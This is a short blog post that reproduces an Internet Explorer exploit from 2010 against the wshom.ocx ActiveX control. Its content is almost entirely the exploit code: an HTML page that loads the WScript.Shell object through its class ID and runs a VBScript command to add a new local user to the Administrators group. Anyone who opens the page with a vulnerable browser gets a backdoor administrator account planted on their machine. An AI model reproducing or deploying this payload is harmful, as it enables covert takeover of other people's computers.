IE wshom.ocx (Run) ActiveX Remote Code Execution ( add admin user)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
| # Exploit Title: IE wshom.ocx (Run) ActiveX Remote Code Execution ( add admin user)
# Date: 22/01/2010
# Author: Stack
# Version: ALL
# Tested on: winsp2
<html>
</font></b></p>
<p>
<object classid='clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8' id='target'
></object>
<script language='vbscript'>
arg1="cmd /c net user username password /add && net localgroup Administrateurs username /add"
target.run arg1
</script></p> |
Related Posts
Tags: IE, wshom.ocx
This entry was posted
on Wednesday, January 27th, 2010 at 1:49 pm and is filed under Vulnerable InforMation, exploit.
You can follow any responses to this entry through the RSS 2.0 feed.
You can leave a response, or trackback from your own site.